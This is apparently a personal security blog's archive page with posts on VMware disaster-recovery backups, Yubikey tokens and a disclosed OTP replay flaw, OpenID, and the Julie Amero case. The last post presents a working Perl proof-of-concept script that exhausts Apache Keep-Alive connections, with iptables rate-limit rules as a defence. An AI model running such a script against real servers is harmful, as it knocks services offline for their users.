Simple Disaster Recovery Backup for VMware

Some time the simple scripts are the best. Disaster Recovery (DR) backups do not have to be made every day.  At some places I've worked we made DR backups as little as one a year.  

DR backups contain everything. You copy the entire envirement so you can buy new hardware and restore the operation of the needed services as quickly as posible without installing from scratch.  Backups on tape are great but how can you restore the data if you don't have a tape server with the right OS and software in place ready to do the restore?  VMware makes this eazy because it uses files as disks and you can make point in time snapshots.
Continue reading

Yubikey 2.0

 I have received my Yubikey 2.0 from Yubico and it is nice.

 The biggest new feature is it has two internal configurations. Each can be programs with different functions.  With Version 1 of the Yubikey you could program it to be a static password or reprogram it with your own AES-128 key.  The static password is nice but much less secure and if you update the AES key you can't use it with Yubico's authintication server any longer. (This has changed.) I wanted to use my Yubikey as a one time password (OTP), not a static password, so I never reprogramed it.

With the new Yubikey 2.0 you can have the best of both worlds. I can now tap my Yubikey and it will give me a OTP or I can hold the button for 2.5 seconds and it will spit out a 64 char password.  The password is good for things like TrueCrypt passwords and encrypted hard disk passwords. 

– functions like CapsLock doubleclicking, auto-URL navigation are gone.
– It can not be programmed unless you have obtained its AES key – but yubico shiped all "developer's keys" without the protection set.
– It deactivates itself for some time if a failed programming attempt is detected
– can be ordered in various colours (Black and White for now)
– supports a pin: after inserting the key, you need to type a 6 digit [0-9] pin on your key board to activate it (it will blink to indicate success)

 You can get your own Yubikey  here

Yubikey Replay Attack

On January 29th (2009) I found a flaw in the Yubico authentication server used by owner of the Yubikey. It allowed reuse of one time passwords (OTP) generated by a Yubikey during the same insertion.

Yubico responded quickly and fixed the bug and release this statement. "The previous version (of the authentication server code) did not properly detect OTPs generated within that same session where the Yubikey remains inserted in the USB slot. If the Yubikey was removed and then reinserted again and a new OTP is generated (most common use case) then OTPs from previous session were invalidated correctly and detected as replay attacks. However, for OTPs that were generated while the key remained inserted then OTPs within that session could be replayed without detection until next removal and insertion of the Yubikey. The reason was that the Yubikey counter for “session use” was not checked by the server. "

The bug was caused by the “session use” counter not being checked by the server. Firmware versions (pre 1.3.3), the validation server was checking the timestamp instead of the session counter, but this was dropped! due to incompatibility with firmware 1.3.3. This bug is now fixed in the Yubico validation server source code as of 2009-02-07. 

This flaw would have allowed a man in the middle (MITM) attacker to reuse a OTP after more then one was generated if the key was not reinserted. For example, if the user where to plug in the Yubikey and begin to logon to a group of SSH sessions without removing the key, the attacker could reuse the OTPs to login to the servers or other the Yubikey was valid on, until the Yubikey was removed, reinserted and used again.

The only recomendation I have now that the bug has been fixed applies even if the bug had not been found. If you have any suspition your Yubikey have have been "borrowed" and you are using it in OTP mode (not static password mode) use it immediately to invalidate generated OTPs. 

Totally Secure – Update

I received PayPal Security key in the mail today. I have been waiting for three weeks for it to arrive. Activation was easy.  Thank you PayPal.  I hope more companies follow your lead.

I tried my PayPal Security Key on the MyPW website. The hope was I could activate it there as well.  It didn't work.  I was not expecting it to.

I'm still seeking the perfect login process.  I'm excited because I see hope.  I think MyPW has it right. For a very small fee they provide an authentication service with that can be used by any Internet connected program.  It is possible for you to login to your desktop at home, your MySpace account, your email at GOOGLE, your PayPal account and even your bank by logging into any one of them once if they used OpenID.  You could then choose an OpenID provider like myOpenID.com , claimID.com, or MyPW.

The last big issue is PASSWORDS SUCK! There are simply to many ways to get someones password from keystroke loggers to just looking over someones shoulder.  For feel this destroys the value of a single sign-on service like PassPort. (Now called Windows Live ID.)

The Key-bob provided by MyPW fixes the password problem. The key-bob contains a one time pad (OTP) known only by the key-bob and the provider (MyPW).  It can not be guessed. Each login has a one in a million chance of getting it right.  By adding a password to this and even if the key-bob gets lost, the person who find it can not access your account because they don't know your password.  If someone records only records your password with a keystroke logger it will not work because they don't know the next complete password containing the next random number.

The key-bob used by PayPal and MyPW is the DigiPass G-3 from Vasco. It is likely PayPal and MyPW purchased system from VascoVasco has other models.

Totally Secure

MyPW Key-bobI have been waiting for years a computer security company to pull their head out of their ass and make a security device that's easy to use and cheap.  It has happened. 

MyPW is making a one time password token affordable to anyone for an  affordable price.

Most people use the same or similar passwords for all they online accounts. There is almost no way anyone can guess your password because it changes very time you use this token.  Every time you push the button on the key-bob it displays a new random number. You use this random number as your password. Anyone trying to guess your password has exactly a 1 in a 1,000,000 chance of getting it right. Add a password to this and the odd become fantastically high.

With a MyPW token you can access any MyPW enabled services and thousand of OpenID enabled web sites. Here is how it works.

When you login to a MyPW enabled website or one using OpenID, your password authentication request is redirected to a MyPW server.  MyPW.com verified your random number and returns a good or bad signal back to the requesting process.

Let us say you have a Linux system at home and you'd like to access it from work.  You know they monitor the office network. They could capture your network traffic and capture your password. You might even be using SSL to encrypt your data but if you don't check the ID of the certificate you get back you may be going through a company proxy and they are decrypting your traffic.  This is legal because you are using their network.

Order your token. You install the MyPW PAM module. (I've had a little trouble getting this part done.  You have to compile the code.) You then edit the file /etc/pam.d/xmlrpc.conf and add your ID and token info to the file.  It will look like this.

mark mysite aslk1u401da2901 5999999 https://services.mypw.com/RPC2

After you compile and install the PAM Module you'll need to sign-up for our Free API access account and a Token or MyPW for your Mobile Phone. Now when you login using this account, your server will use MyPW to verify your password (the random number).  If your anyone from your office tries to use the password it will not work a second time.

I haven't ordered a token from MyPW yet. I will.  I have ordered a PayPal token for $5 and I'm guessing they are the same. I'm hoping PayPal and services like them wouldn't require you to carry around a token for each web service you use.  This is what OpenID is all about. In a perfect world, I should be able to use one token to access all my accounts. This can be done today if everyone used OpenID as their login.

Who Am I

Who am I?

I google therefor I am.  But who am I.

On the Internet nobody knows you're a dog.  That's great. Anonymity is a wonderful thing that lets the truth be told without people being killed.  It also allows for identity theft.  Employs Google prospective employees to look into their past. What if someone with your name was arrested for drunk driving. How can you dis-claim stories using your name?

I've found ClaimID.com helps people simply and easily manage their online identity. You can claim things that are about or my yourself and deny things that have nothing to do with your or are false.  Here is who I am.

How many Internet logon ID's do you have? Do you have more then one to some sites? I do too. Do you use the same password for each? If you do your protection is only as good as the weakest of them. Do you use the same password for your bank as you do for your favorite blog?

If every website would use it, OpenID could end our password problems. OpenID is a free / Open protocol designed to manage authentication.  Here is how it works.

When you login to an site that uses OpenID it take you to your choice of websites to login.  For example, if I login to the OpenID Directory after clicking on login I type in mark.grennan.com. Whats on this page doesn't matter. What matters in in the header (not seen in your browser there is this string. <link rel="openid.server" href="http://openid.claimid.com/server" />. This send me to ClaimID's OpenID server and asks me my password. It then send me back to OpenID directory.

There is a great Video about OpenID on Google Video.

What makes OpenID good is it's simplicity. You control where your authentication is done and how. You can use a service like OpenID, CalimID or Verisign's Personal Identity Provider or you could create your own system that requiring all kinds info to authenticate you. If your logging into your bank type in the ID that redirects you to a high security level service.

Take control of your identity.

Computer Illiterate Teacher Goes to Jail

Computer Crime SceneJulie Amero, substitute teacher, was convicted, of exposing children in her classroom Internet porn.  I believe this is a great injustice. I've read she was told to let the kids use the computer and not to turn it off.  I've also read the computer was an old Windows 95 system.  My experience tells me this computer was not well maintained.  I'd place a bet that it had never been updated. Evidence of this is the fact that the computer was running Internet Exployer 5.  IE5 is very old.

The computer forensics examiner W. Herbert Horner confirmed everything she said: The computer was infected before she got there, a site visited that morning caused the pop-ups to start, and the porn was the result of pop-ups, not deliberate action.  The judge didn't let Horner give his full testimony.  Horner later said, "This was one of the most frustrating experiences of my career, knowing full well that the person is innocent and not being allowed to provide logical proof.

Some have said she should have just turned off the computer. But the harm was already done. Turning off the computer wouldn't have helped.

I believe the people responsible are the administrators of the school system of Norwich. It took a lot of neglect of what the Internet is like and how computer vulnerabilities are found everyday to put such a system in a classroom.

Now Julie Amero may get some help. Connecticut criminal defense lawyer William Dow has stepped in and offered help to Julie Amero.

I'm wondering if other children in the Norwich school district are at risk?

McAfee Calls for the “Digital Dark Ages”

This month (July 2006) McAfee Avert Labs issued their first issue of Sage. Sage is a semiannual newsletter with the goal to publish predictive and incisive security research that helps you understand the current and evolving threat environment.

Over the years I have been happy with McAfee and their products.  Recently, I have become very pleased with McAfee because of the Sabag Security podcast produced by two of their employees. http://www.saeagsecurity.com/ Sabag Security is a wonderful weekly coverage of what's happen in security. When I downloaded and read the first issue of Sage, I expected something like the podcast with more details.

To my surprise, McAfee's Sage newsletter is a blast at Open Source and intellectual freedom and a call to keep us all secure by making all intellectual property (IP) secret.

Sage opens with the Editor's notes by Kevin J. Soo Hoo.  Mr. Hoo describes Open Source by saying "By open source, we refer to the free and unconditional sharing of source code and ideas."  Mr. Hoo also says "Whether posting a terrorist training manual or a how-to guide for attacking infrastructure, there are consequences to the free and open share of information –".

Continue reading

Where are your realy going today?

I found this great webpage testing tool called Paros. You configure it as a proxy server
and it records every connection your browser makes. It is used to debug websites. I used
it to monitor what my browser was doing and I was quite suprised.

As an experiment I went to five website I visit regulary.  

    www.google.com          – Search
    www.yahoo.com           – search
    www.kfor.com              – local news
    www.myspace.com       – Watching my child
    www.classmates.com    – My wife's 30th reunion

I was expecting two or three hits pre URL.  It's is common for sites companies to have
more then one web server for their site. Some system hold graphics while others monitor
your access. I was supprised to see my clicks are ten to one. I accessed ten sites for
every url I went to.

Continue reading

The Apache Keep-Alive Tarpit Exploit

I have found a denial of service (DOS) exploit problem with the Keep-Alive setting in Apache version two. This may exist in other version as well.

What I’ve found is, with Keep-Alive off, Apache will continue to serve content. While, with Keep-Alive on a simple script can use up every connection on a server and block other users.

Here is the test I used.

1) turn on server-status
2) check the setting – KeepAlive on
3) and set KeepAliveTimeout to 45
4) restart Apache
5) run the script below and watch the connections
6) browser the server under attack. It should continue to work
7) un-comment the Keep-Alive line in the script and perform the test again.

The server-status module has a scoreboard block that shows the current connection states for each possible connection.

 

____K__._.__K___K__K_K___CK_WK__K_K_.C__K___K__KK__K__K_K__K_K__
_______KK__K___K_K_K__KK___KK___K____K______K_____K_______K__K_K
_KKKK__...______C_K____.__.._KK__K_K_K______K__K_K_________K_K_
__K____.KKK_KKK__K__K_K____C_____.___KK___K_W____K__KKK___K_K___
_KK________K____K__K_____.___K___._KK___K___KK__K________K_K_KK_

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process

I found with Keep-Alive off, this connections block shows all ‘W’s and the server continues to serve content. I think Apache closes the oldest connection for the new requests. With Keep-Alive on, each connection opened is dedicated to the user that opened it.

So Keep-Alive can be used as a very effective denial of service attack, especially if the Apache KeepAliveTimeout setting high. The default KeepAliveTimeout is five (5) seconds. I have worked on systems were this number is set to as high as 45 seconds.

My proof of concept script tries to open 2000 tcp connections to YOUR.IP.GOES.HERE and then sleeps for sixty seconds.

Here is the script I used.

 

#!/usr/bin/perl
use IO::Socket;
$a = 2000;
$sock[$a] = 0;
while ($a > 0) {
    $sock[$a] = new IO::Socket::INET (
        PeerAddr => 'YOUR.IP.GOES.HERE',
        PeerPort => '80',
        Proto => 'tcp',
        ); die "Could not create socket: $!n" unless         $sock[$a];
    my $sck = $sock[$a];
    print $sck "GET / HTTP/1.0n";
#    print $sck "Connection: Keep-Aliven";
    print $sck "n";
    $a–;
}
sleep 60;

If you are using SSL turn off Keep-Alive may be very painfull. With out Keep-Alive SSL sessions get negocated much more often.

One way to limit this attact is to use a firewall and limit the number of new TCP sessions can be opened from a single IP.

With Linux IPTABLES the rules look like this:

 

iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m
recent --update --seconds 4 --hitcount 8 -j DROP

I hope someone can show where I've gone wrong here.